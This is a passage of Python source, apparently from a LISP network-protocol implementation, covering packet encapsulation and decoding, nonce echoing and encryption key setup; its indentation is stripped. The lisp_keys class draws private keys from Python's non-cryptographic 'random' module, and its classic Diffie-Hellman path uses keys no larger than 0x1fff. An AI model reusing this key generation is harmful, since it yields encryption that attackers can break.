# Finally fix outer UDP header length. Byte-swap it.
#
udp_len_index = outer_hdr_len - 12
l = socket.htons(length)
fragment = fragment[0:udp_len_index] + struct.pack("H", l) + \
fragment[udp_len_index+2::]
fragments.append(fragment)
#endfor
return(fragments, "Fragment-Inner")
#enddef
def fix_outer_header(self, packet):
#
# IP_HDRINCL requires the total-length and frag-offset fields to be
# in host byte order. So have to byte-swapped here. But when testing
# we (UPC guys) discovered the frag field didn't need swapping. The
# conclusion is that byte-swapping is necessary for MacOS but not for
# Linux OSes.
#
if (self.outer_version == 4 or self.inner_version == 4):
if (lisp_is_macos()):
packet = packet[0:2] + packet[3:4] + packet[2:3] + \
packet[4:6] + packet[7:8] + packet[6:7] + packet[8::]
else:
packet = packet[0:2] + packet[3:4] + packet[2:3] + packet[4::]
#endif
#endif
return(packet)
#enddef
def send_packet(self, lisp_raw_socket, dest):
if (lisp_flow_logging and dest != self.inner_dest): self.log_flow(True)
dest = dest.print_address_no_iid()
fragments, in_or_out = self.fragment()
for fragment in fragments:
if (len(fragments) != 1):
self.packet = fragment
self.print_packet(in_or_out, True)
#endif
try: lisp_raw_socket.sendto(fragment, (dest, 0))
except socket.error as e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#endfor
#enddef
def send_l2_packet(self, l2_socket, mac_header):
if (l2_socket == None):
lprint("No layer-2 socket, drop IPv6 packet")
return
#endif
if (mac_header == None):
lprint("Could not build MAC header, drop IPv6 packet")
return
#endif
packet = mac_header + self.packet
# try: l2_socket.send(packet)
# except socket.error as e:
# lprint("send_l2_packet(): socket.send() failed: {}".format(e))
# #endtry
# return
#
# Use tuntap tunnel interface instead of raw sockets for IPv6
# decapsulated packets.
#
l2_socket.write(packet)
return
#enddef
def bridge_l2_packet(self, eid, db):
try: dyn_eid = db.dynamic_eids[eid.print_address_no_iid()]
except: return
try: interface = lisp_myinterfaces[dyn_eid.interface]
except: return
try:
socket = interface.get_bridge_socket()
if (socket == None): return
except: return
try: socket.send(self.packet)
except socket.error as e:
lprint("bridge_l2_packet(): socket.send() failed: {}".format(e))
#endtry
#enddef
def is_lisp_packet(self, packet):
udp = (struct.unpack("B", packet[9:10])[0] == LISP_UDP_PROTOCOL)
if (udp == False): return(False)
port = struct.unpack("H", packet[22:24])[0]
if (socket.ntohs(port) == LISP_DATA_PORT): return(True)
port = struct.unpack("H", packet[20:22])[0]
if (socket.ntohs(port) == LISP_DATA_PORT): return(True)
return(False)
#enddef
def decode(self, is_lisp_packet, lisp_ipc_socket, stats):
self.packet_error = ""
packet = self.packet
orig_len = len(packet)
L3 = L2 = True
#
# Get version number of outer header so we can decode outer addresses.
#
header_len = 0
iid = self.lisp_header.get_instance_id()
if (is_lisp_packet):
version = struct.unpack("B", packet[0:1])[0]
self.outer_version = version >> 4
if (self.outer_version == 4):
#
# MacOS is zeroing the IP header checksum for a raw socket.
# If we receive this, bypass the checksum calculation.
#
orig_checksum = struct.unpack("H", packet[10:12])[0]
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
if (orig_checksum != 0 or lisp_is_macos() == False):
self.packet_error = "checksum-error"
if (stats):
stats[self.packet_error].increment(orig_len)
#endif
lprint("IPv4 header checksum failed for outer header")
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
afi = LISP_AFI_IPV4
offset = 12
self.outer_tos = struct.unpack("B", packet[1:2])[0]
self.outer_ttl = struct.unpack("B", packet[8:9])[0]
header_len = 20
elif (self.outer_version == 6):
afi = LISP_AFI_IPV6
offset = 8
tos = struct.unpack("H", packet[0:2])[0]
self.outer_tos = (socket.ntohs(tos) >> 4) & 0xff
self.outer_ttl = struct.unpack("B", packet[7:8])[0]
header_len = 40
else:
self.packet_error = "outer-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode outer header")
return(None)
#endif
self.outer_source.afi = afi
self.outer_dest.afi = afi
addr_length = self.outer_source.addr_length()
self.outer_source.unpack_address(packet[offset:offset+addr_length])
offset += addr_length
self.outer_dest.unpack_address(packet[offset:offset+addr_length])
packet = packet[header_len::]
self.outer_source.mask_len = self.outer_source.host_mask_len()
self.outer_dest.mask_len = self.outer_dest.host_mask_len()
#
# Get UDP fields
#
short = struct.unpack("H", packet[0:2])[0]
self.udp_sport = socket.ntohs(short)
short = struct.unpack("H", packet[2:4])[0]
self.udp_dport = socket.ntohs(short)
short = struct.unpack("H", packet[4:6])[0]
self.udp_length = socket.ntohs(short)
short = struct.unpack("H", packet[6:8])[0]
self.udp_checksum = socket.ntohs(short)
packet = packet[8::]
#
# Determine what is inside, a packet or a frame.
#
L3 = (self.udp_dport == LISP_DATA_PORT or
self.udp_sport == LISP_DATA_PORT)
L2 = (self.udp_dport in (LISP_L2_DATA_PORT, LISP_VXLAN_DATA_PORT))
#
# Get LISP header fields.
#
if (self.lisp_header.decode(packet) == False):
self.packet_error = "lisp-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
lprint("Cannot decode LISP header")
return(None)
#endif
packet = packet[8::]
iid = self.lisp_header.get_instance_id()
header_len += 16
#endif
if (iid == 0xffffff): iid = 0
#
# Time to decrypt if K-bits set.
#
decrypted = False
key_id = self.lisp_header.k_bits
if (key_id):
addr_str = lisp_get_crypto_decap_lookup_key(self.outer_source,
self.udp_sport)
if (addr_str == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} for key-id {} to decrypt packet".format(ks, key_id))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
key = lisp_crypto_keys_by_rloc_decap[addr_str][key_id]
if (key == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} to decrypt packet from RLOC {}".format(ks,
red(addr_str, False)))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#
# Decrypt and continue processing inner header.
#
key.use_count += 1
packet, decrypted = self.decrypt(packet, header_len, key, addr_str)
if (decrypted == False):
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#
# Chacha produced plaintext in unicode for py2. Convert to raw-
# unicode-escape before proceedingl Do this in do_icv() too.
#
if (key.cipher_suite == LISP_CS_25519_CHACHA):
packet = packet.encode("raw_unicode_escape")
#endif
#endif
#
# Get inner header fields.
#
version = struct.unpack("B", packet[0:1])[0]
self.inner_version = version >> 4
if (L3 and self.inner_version == 4 and version >= 0x45):
packet_len = socket.ntohs(struct.unpack("H", packet[2:4])[0])
self.inner_tos = struct.unpack("B", packet[1:2])[0]
self.inner_ttl = struct.unpack("B", packet[8:9])[0]
self.inner_protocol = struct.unpack("B", packet[9:10])[0]
self.inner_source.afi = LISP_AFI_IPV4
self.inner_dest.afi = LISP_AFI_IPV4
self.inner_source.unpack_address(packet[12:16])
self.inner_dest.unpack_address(packet[16:20])
frag_field = socket.ntohs(struct.unpack("H", packet[6:8])[0])
self.inner_is_fragment = (frag_field & 0x2000 or frag_field != 0)
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[20:22])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[22:24])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L3 and self.inner_version == 6 and version >= 0x60):
packet_len = socket.ntohs(struct.unpack("H", packet[4:6])[0]) + 40
tos = struct.unpack("H", packet[0:2])[0]
self.inner_tos = (socket.ntohs(tos) >> 4) & 0xff
self.inner_ttl = struct.unpack("B", packet[7:8])[0]
self.inner_protocol = struct.unpack("B", packet[6:7])[0]
self.inner_source.afi = LISP_AFI_IPV6
self.inner_dest.afi = LISP_AFI_IPV6
self.inner_source.unpack_address(packet[8:24])
self.inner_dest.unpack_address(packet[24:40])
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[40:42])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[42:44])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L2):
packet_len = len(packet)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_source.afi = LISP_AFI_MAC
self.inner_dest.afi = LISP_AFI_MAC
self.inner_dest.unpack_address(self.swap_mac(packet[0:6]))
self.inner_source.unpack_address(self.swap_mac(packet[6:12]))
elif (self.lisp_header.get_instance_id() == 0xffffff):
if (lisp_flow_logging): self.log_flow(False)
return(self)
else:
self.packet_error = "bad-inner-version"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode encapsulation, header version {}".format(\
hex(version)))
packet = lisp_format_packet(packet[0:20])
lprint("Packet header: {}".format(packet))
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(None)
#endif
self.inner_source.mask_len = self.inner_source.host_mask_len()
self.inner_dest.mask_len = self.inner_dest.host_mask_len()
self.inner_source.instance_id = iid
self.inner_dest.instance_id = iid
#
# If we are configured to do Nonce-Echoing, do lookup on source-EID
# to obtain source RLOC to store nonce to echo.
#
if (lisp_nonce_echoing and is_lisp_packet):
echo_nonce = lisp_get_echo_nonce(self.outer_source, None)
if (echo_nonce == None):
rloc_str = self.outer_source.print_address_no_iid()
echo_nonce = lisp_echo_nonce(rloc_str)
#endif
nonce = self.lisp_header.get_nonce()
if (self.lisp_header.is_e_bit_set()):
echo_nonce.receive_request(lisp_ipc_socket, nonce)
elif (echo_nonce.request_nonce_sent):
echo_nonce.receive_echo(lisp_ipc_socket, nonce)
#endif
#endif
#
# If we decrypted, we may have to truncate packet if the encrypter
# padded the packet.
#
if (decrypted): self.packet += packet[:packet_len]
#
# Log a packet that was parsed correctly.
#
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(self)
#enddef
def swap_mac(self, mac):
return(mac[1] + mac[0] + mac[3] + mac[2] + mac[5] + mac[4])
#enddef
def strip_outer_headers(self):
offset = 16
offset += 20 if (self.outer_version == 4) else 40
self.packet = self.packet[offset::]
return(self)
#enddef
def hash_ports(self):
packet = self.packet
version = self.inner_version
hashval = 0
if (version == 4):
protocol = struct.unpack("B", packet[9:10])[0]
if (self.inner_is_fragment): return(protocol)
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[20:24])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
if (version == 6):
protocol = struct.unpack("B", packet[6:7])[0]
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[40:44])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
return(hashval)
#enddef
def hash_packet(self):
hashval = self.inner_source.address ^ self.inner_dest.address
hashval += self.hash_ports()
if (self.inner_version == 4):
hashval = (hashval >> 16) ^ (hashval & 0xffff)
elif (self.inner_version == 6):
hashval = (hashval >> 64) ^ (hashval & 0xffffffffffffffff)
hashval = (hashval >> 32) ^ (hashval & 0xffffffff)
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
self.udp_sport = 0xf000 | (hashval & 0xfff)
#enddef
def print_packet(self, s_or_r, is_lisp_packet):
if (is_lisp_packet == False):
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(("{} {}, tos/ttl: {}/{}, length: {}, packet: {} ..."). \
format(bold(s_or_r, False),
green(iaddr_str, False), self.inner_tos,
self.inner_ttl, len(self.packet),
lisp_format_packet(self.packet[0:60])))
return
#endif
if (s_or_r.find("Receive") != -1):
ed = "decap"
ed += "-vxlan" if self.udp_dport == LISP_VXLAN_DATA_PORT else ""
else:
ed = s_or_r
if (ed in ["Send", "Replicate"] or ed.find("Fragment") != -1):
ed = "encap"
#endif
#endif
oaddr_str = "{} -> {}".format(self.outer_source.print_address_no_iid(),
self.outer_dest.print_address_no_iid())
#
# Special case where Info-Request is inside of a 4341 packet for
# NAT-traversal.
#
if (self.lisp_header.get_instance_id() == 0xffffff):
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, ")
line += bold("control-packet", False) + ": {} ..."
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport,
self.udp_dport, lisp_format_packet(self.packet[0:56])))
return
else:
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, inner EIDs: {}, " + \
"inner tos/ttl: {}/{}, length: {}, {}, packet: {} ...")
#endif
if (self.lisp_header.k_bits):
if (ed == "encap"): ed = "encrypt/encap"
if (ed == "decap"): ed = "decap/decrypt"
#endif
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport, self.udp_dport,
green(iaddr_str, False), self.inner_tos, self.inner_ttl,
len(self.packet), self.lisp_header.print_header(ed),
lisp_format_packet(self.packet[0:56])))
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.inner_source, self.inner_dest))
#enddef
def get_raw_socket(self):
iid = str(self.lisp_header.get_instance_id())
if (iid == "0"): return(None)
if (iid not in lisp_iid_to_interface): return(None)
interface = lisp_iid_to_interface[iid]
s = interface.get_socket()
if (s == None):
string = bold("SO_BINDTODEVICE", False)
enforce = (os.getenv("LISP_ENFORCE_BINDTODEVICE") != None)
lprint("{} required for multi-tenancy support, {} packet".format( \
string, "drop" if enforce else "forward"))
if (enforce): return(None)
#endif
iid = bold(iid, False)
d = bold(interface.device, False)
dprint("Send packet on instance-id {} interface {}".format(iid, d))
return(s)
#enddef
def log_flow(self, encap):
global lisp_flow_log
dump = os.path.exists("./log-flows")
if (len(lisp_flow_log) == LISP_FLOW_LOG_SIZE or dump):
args = [lisp_flow_log]
lisp_flow_log = []
threading.Thread(target=lisp_write_flow_log, args=args).start()
if (dump): os.system("rm ./log-flows")
return
#endif
ts = datetime.datetime.now()
lisp_flow_log.append([ts, encap, self.packet, self])
#endif
def print_flow(self, ts, encap, packet):
ts = ts.strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
flow = "{}: {}".format(ts, "encap" if encap else "decap")
osrc = red(self.outer_source.print_address_no_iid(), False)
odst = red(self.outer_dest.print_address_no_iid(), False)
isrc = green(self.inner_source.print_address(), False)
idst = green(self.inner_dest.print_address(), False)
if (self.lisp_header.get_instance_id() == 0xffffff):
flow += " {}:{} -> {}:{}, LISP control message type {}\n"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
self.inner_version)
return(flow)
#endif
if (self.outer_dest.is_null() == False):
flow += " {}:{} -> {}:{}, len/tos/ttl {}/{}/{}"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
len(packet), self.outer_tos, self.outer_ttl)
#endif
#
# Can't look at inner header if encrypted. Protecting user privacy.
#
if (self.lisp_header.k_bits != 0):
error = "\n"
if (self.packet_error != ""):
error = " ({})".format(self.packet_error) + error
#endif
flow += ", encrypted" + error
return(flow)
#endif
#
# Position to inner header.
#
if (self.outer_dest.is_null() == False):
packet = packet[36::] if self.outer_version == 4 else packet[56::]
#endif
protocol = packet[9:10] if self.inner_version == 4 else packet[6:7]
protocol = struct.unpack("B", protocol)[0]
flow += " {} -> {}, len/tos/ttl/prot {}/{}/{}/{}"
flow = flow.format(isrc, idst, len(packet), self.inner_tos,
self.inner_ttl, protocol)
#
# Show some popular transport layer data.
#
if (protocol in [6, 17]):
ports = packet[20:24] if self.inner_version == 4 else packet[40:44]
if (len(ports) == 4):
ports = socket.ntohl(struct.unpack("I", ports)[0])
flow += ", ports {} -> {}".format(ports >> 16, ports & 0xffff)
#endif
elif (protocol == 1):
seq = packet[26:28] if self.inner_version == 4 else packet[46:48]
if (len(seq) == 2):
seq = socket.ntohs(struct.unpack("H", seq)[0])
flow += ", icmp-seq {}".format(seq)
#endif
#endof
if (self.packet_error != ""):
flow += " ({})".format(self.packet_error)
#endif
flow += "\n"
return(flow)
#endif
def is_trace(self):
ports = [self.inner_sport, self.inner_dport]
return(self.inner_protocol == LISP_UDP_PROTOCOL and
LISP_TRACE_PORT in ports)
#enddef
#endclass
#
# LISP encapsulation header definition.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4341 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L |N|L|E|V|I|P|K|K| Nonce/Map-Version |
# I \ +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# S / | Instance ID/Locator-Status-Bits |
# P +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_N_BIT = 0x80000000
LISP_L_BIT = 0x40000000
LISP_E_BIT = 0x20000000
LISP_V_BIT = 0x10000000
LISP_I_BIT = 0x08000000
LISP_P_BIT = 0x04000000
LISP_K_BITS = 0x03000000
class lisp_data_header(object):
def __init__(self):
self.first_long = 0
self.second_long = 0
self.k_bits = 0
#enddef
def print_header(self, e_or_d):
first_long = lisp_hex_string(self.first_long & 0xffffff)
second_long = lisp_hex_string(self.second_long).zfill(8)
line = ("{} LISP-header -> flags: {}{}{}{}{}{}{}{}, nonce: {}, " + \
"iid/lsb: {}")
return(line.format(bold(e_or_d, False),
"N" if (self.first_long & LISP_N_BIT) else "n",
"L" if (self.first_long & LISP_L_BIT) else "l",
"E" if (self.first_long & LISP_E_BIT) else "e",
"V" if (self.first_long & LISP_V_BIT) else "v",
"I" if (self.first_long & LISP_I_BIT) else "i",
"P" if (self.first_long & LISP_P_BIT) else "p",
"K" if (self.k_bits in [2,3]) else "k",
"K" if (self.k_bits in [1,3]) else "k",
first_long, second_long))
#enddef
def encode(self):
packet_format = "II"
first_long = socket.htonl(self.first_long)
second_long = socket.htonl(self.second_long)
header = struct.pack(packet_format, first_long, second_long)
return(header)
#enddef
def decode(self, packet):
packet_format = "II"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long, second_long = \
struct.unpack(packet_format, packet[:format_size])
self.first_long = socket.ntohl(first_long)
self.second_long = socket.ntohl(second_long)
self.k_bits = (self.first_long & LISP_K_BITS) >> 24
return(True)
#enddef
def key_id(self, key_id):
self.first_long &= ~(0x3 << 24)
self.first_long |= ((key_id & 0x3) << 24)
self.k_bits = key_id
#enddef
def nonce(self, nonce):
self.first_long |= LISP_N_BIT
self.first_long |= nonce
#enddef
def map_version(self, version):
self.first_long |= LISP_V_BIT
self.first_long |= version
#enddef
def instance_id(self, iid):
if (iid == 0): return
self.first_long |= LISP_I_BIT
self.second_long &= 0xff
self.second_long |= (iid << 8)
#enddef
def get_instance_id(self):
return((self.second_long >> 8) & 0xffffff)
#enddef
def locator_status_bits(self, lsbs):
self.first_long |= LISP_L_BIT
self.second_long &= 0xffffff00
self.second_long |= (lsbs & 0xff)
#enddef
def is_request_nonce(self, nonce):
return(nonce & 0x80000000)
#enddef
def request_nonce(self, nonce):
self.first_long |= LISP_E_BIT
self.first_long |= LISP_N_BIT
self.first_long |= (nonce & 0xffffff)
#enddef
def is_e_bit_set(self):
return(self.first_long & LISP_E_BIT)
#enddef
def get_nonce(self):
return(self.first_long & 0xffffff)
#enddef
#endclass
class lisp_echo_nonce(object):
def __init__(self, rloc_str):
self.rloc_str = rloc_str
self.rloc = lisp_address(LISP_AFI_NONE, rloc_str, 0, 0)
self.request_nonce_sent = None
self.echo_nonce_sent = None
self.last_request_nonce_sent = None
self.last_new_request_nonce_sent = None
self.last_echo_nonce_sent = None
self.last_new_echo_nonce_sent = None
self.request_nonce_rcvd = None
self.echo_nonce_rcvd = None
self.last_request_nonce_rcvd = None
self.last_echo_nonce_rcvd = None
self.last_good_echo_nonce_rcvd = None
lisp_nonce_echo_list[rloc_str] = self
#enddef
def send_ipc(self, ipc_socket, ipc):
source = "lisp-itr" if lisp_i_am_itr else "lisp-etr"
dest = "lisp-etr" if lisp_i_am_itr else "lisp-itr"
ipc = lisp_command_ipc(ipc, source)
lisp_ipc(ipc, ipc_socket, dest)
#enddef
def send_request_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%R%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def send_echo_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%E%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def receive_request(self, ipc_socket, nonce):
old_nonce = self.request_nonce_rcvd
self.request_nonce_rcvd = nonce
self.last_request_nonce_rcvd = lisp_get_timestamp()
if (lisp_i_am_rtr): return
if (old_nonce != nonce): self.send_request_ipc(ipc_socket, nonce)
#enddef
def receive_echo(self, ipc_socket, nonce):
if (self.request_nonce_sent != nonce): return
self.last_echo_nonce_rcvd = lisp_get_timestamp()
if (self.echo_nonce_rcvd == nonce): return
self.echo_nonce_rcvd = nonce
if (lisp_i_am_rtr): return
self.send_echo_ipc(ipc_socket, nonce)
#enddef
def get_request_or_echo_nonce(self, ipc_socket, remote_rloc):
#
# If we are in both request-nonce and echo-nonce mode, let the
# higher IP addressed RLOC be in request mode.
#
if (self.request_nonce_sent and self.echo_nonce_sent and remote_rloc):
local_rloc = lisp_myrlocs[0] if remote_rloc.is_ipv4() \
else lisp_myrlocs[1]
if (remote_rloc.address > local_rloc.address):
a = "exit"
self.request_nonce_sent = None
else:
a = "stay in"
self.echo_nonce_sent = None
#endif
c = bold("collision", False)
l = red(local_rloc.print_address_no_iid(), False)
r = red(remote_rloc.print_address_no_iid(), False)
lprint("Echo nonce {}, {} -> {}, {} request-nonce mode".format(c,
l, r, a))
#endif
#
# If we are echoing, return echo-nonce. Or get out of echo-nonce mode.
#
if (self.echo_nonce_sent != None):
nonce = self.echo_nonce_sent
e = bold("Echoing", False)
lprint("{} nonce 0x{} to {}".format(e,
lisp_hex_string(nonce), red(self.rloc_str, False)))
self.last_echo_nonce_sent = lisp_get_timestamp()
self.echo_nonce_sent = None
return(nonce)
#endif
#endif
#
# Should we stop requesting nonce-echoing? Only do so if we received
# a echo response and some time (10 seconds) has past.
#
nonce = self.request_nonce_sent
last = self.last_request_nonce_sent
if (nonce and last != None):
if (time.time() - last >= LISP_NONCE_ECHO_INTERVAL):
self.request_nonce_sent = None
lprint("Stop request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
return(None)
#endif
#endif
#
# Start echoing the nonce. Get a new nonce. If a echo-nonce is stored
# use the same nonce as last time regardless if we received an echo
# response. High-order bit set is telling caller to set the e-bit in
# header.
#
if (nonce == None):
nonce = lisp_get_data_nonce()
if (self.recently_requested()): return(nonce)
self.request_nonce_sent = nonce
lprint("Start request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
self.last_new_request_nonce_sent = lisp_get_timestamp()
#
# Send the request-nonce to the ETR so it can tell us when the
# other side has echoed this request-nonce.
#
if (lisp_i_am_itr == False): return(nonce | 0x80000000)
self.send_request_ipc(ipc_socket, nonce)
else:
lprint("Continue request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
#endif
#
# Continue sending request-nonce. But if we never received an echo,
# don't update timer.
#
self.last_request_nonce_sent = lisp_get_timestamp()
return(nonce | 0x80000000)
#enddef
def request_nonce_timeout(self):
if (self.request_nonce_sent == None): return(False)
if (self.request_nonce_sent == self.echo_nonce_rcvd): return(False)
elapsed = time.time() - self.last_request_nonce_sent
last_resp = self.last_echo_nonce_rcvd
return(elapsed >= LISP_NONCE_ECHO_INTERVAL and last_resp == None)
#enddef
def recently_requested(self):
last_resp = self.last_request_nonce_sent
if (last_resp == None): return(False)
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def recently_echoed(self):
if (self.request_nonce_sent == None): return(True)
#
# Check how long its been since last received echo.
#
last_resp = self.last_good_echo_nonce_rcvd
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
if (elapsed <= LISP_NONCE_ECHO_INTERVAL): return(True)
#
# If last received echo was a while ago and a new request-nonce was
# sent recently, say the echo happen so we can bootstrap a new request
# and echo exchange.
#
last_resp = self.last_new_request_nonce_sent
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def change_state(self, rloc):
if (rloc.up_state() and self.recently_echoed() == False):
down = bold("down", False)
good_echo = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
lprint("Take {} {}, last good echo: {}".format( \
red(self.rloc_str, False), down, good_echo))
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
return
#endif
if (rloc.no_echoed_nonce_state() == False): return
if (self.recently_requested() == False):
up = bold("up", False)
lprint("Bring {} {}, retry request-nonce mode".format( \
red(self.rloc_str, False), up))
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
#endif
#enddef
def print_echo_nonce(self):
rs = lisp_print_elapsed(self.last_request_nonce_sent)
er = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
es = lisp_print_elapsed(self.last_echo_nonce_sent)
rr = lisp_print_elapsed(self.last_request_nonce_rcvd)
s = space(4)
output = "Nonce-Echoing:\n"
output += ("{}Last request-nonce sent: {}\n{}Last echo-nonce " + \
"received: {}\n").format(s, rs, s, er)
output += ("{}Last request-nonce received: {}\n{}Last echo-nonce " + \
"sent: {}").format(s, rr, s, es)
return(output)
#enddef
#endclass
#
# lisp_keys
#
# Class to hold Diffie-Hellman keys. For ECDH use RFC5114 gx value of
# "192-bit Random ECP Group".
#
class lisp_keys(object):
def __init__(self, key_id, do_curve=True, do_chacha=use_chacha,
do_poly=use_poly):
self.uptime = lisp_get_timestamp()
self.last_rekey = None
self.rekey_count = 0
self.use_count = 0
self.key_id = key_id
self.cipher_suite = LISP_CS_1024
self.dh_g_value = LISP_CS_1024_G
self.dh_p_value = LISP_CS_1024_P
self.curve25519 = None
self.cipher_suite_string = ""
if (do_curve):
if (do_chacha):
self.cipher_suite = LISP_CS_25519_CHACHA
self.cipher_suite_string = "chacha"
elif (os.getenv("LISP_USE_AES_GCM") != None):
self.cipher_suite = LISP_CS_25519_GCM
self.cipher_suite_string = "aes-gcm"
else:
self.cipher_suite = LISP_CS_25519_CBC
self.cipher_suite_string = "aes-cbc"
#endif
self.local_private_key = random.randint(0, 2**128-1)
key = lisp_hex_string(self.local_private_key).zfill(32)
self.curve25519 = curve25519.Private(key.encode())
else:
self.local_private_key = random.randint(0, 0x1fff)
#endif
self.local_public_key = self.compute_public_key()
self.remote_public_key = None
self.shared_key = None
self.encrypt_key = None
self.icv_key = None
self.icv = poly1305 if do_poly else hashlib.sha256
self.iv = None
self.get_iv()
self.do_poly = do_poly
#enddef
def copy_keypair(self, key):
self.local_private_key = key.local_private_key
self.local_public_key = key.local_public_key
self.curve25519 = key.curve25519
#enddef
def get_iv(self):
if (self.iv == None):
self.iv = random.randint(0, LISP_16_128_MASK)
else:
self.iv += 1
#endif
iv = self.iv
if (self.cipher_suite == LISP_CS_25519_CHACHA):
iv = struct.pack("Q", iv & LISP_8_64_MASK)
elif (self.cipher_suite == LISP_CS_25519_GCM):
ivh = struct.pack("I", (iv >> 64) & LISP_4_32_MASK)
ivl = struct.pack("Q", iv & LISP_8_64_MASK)
iv = ivh + ivl
else:
iv = struct.pack("QQ", iv >> 64, iv & LISP_8_64_MASK)
return(iv)
#enddef
def key_length(self, key):
if (isinstance(key, int)): key = self.normalize_pub_key(key)
return(old_div(len(key), 2))
#enddef
def print_key(self, key):
k = self.normalize_pub_key(key)
top = k[0:4].decode()
bot = k[-4::].decode()
return("0x{}...{}({})".format(top, bot, self.key_length(k)))
#enddef
def normalize_pub_key(self, key):
if (isinstance(key, int)):
key = lisp_hex_string(key).zfill(256)
return(key)
#endif
if (self.curve25519): return(binascii.hexlify(key))
return(key)
#enddef
def print_keys(self, do_bold=True):
l = bold("local-key: ", False) if do_bold else "local-key: "
if (self.local_public_key == None):
l += "none"
else:
l += self.print_key(self.local_public_key)
#endif
r = bold("remote-key: ", False) if do_bold else "remote-key: "
if (self.remote_public_key == None):
r += "none"
else:
r += self.print_key(self.remote_public_key)
#endif
dh = "ECDH" if (self.curve25519) else "DH"
cs = self.cipher_suite
return("{} cipher-suite: {}, {}, {}".format(dh, cs, l, r))
#enddef
def compare_keys(self, keys):
if (self.dh_g_value != keys.dh_g_value): return(False)
if (self.dh_p_value != keys.dh_p_value): return(False)
if (self.remote_public_key != keys.remote_public_key): return(False)
return(True)
#enddef
def compute_public_key(self):
if (self.curve25519): return(self.curve25519.get_public().public)
key = self.local_private_key
g = self.dh_g_value
p = self.dh_p_value
return(int((g**key) % p))
#enddef
def compute_shared_key(self, ed, print_shared=False):
key = self.local_private_key
remote_key = self.remote_public_key
compute = bold("Compute {} shared-key".format(ed), False)
lprint("{}, key-material: {}".format(compute, self.print_keys()))
if (self.curve25519):
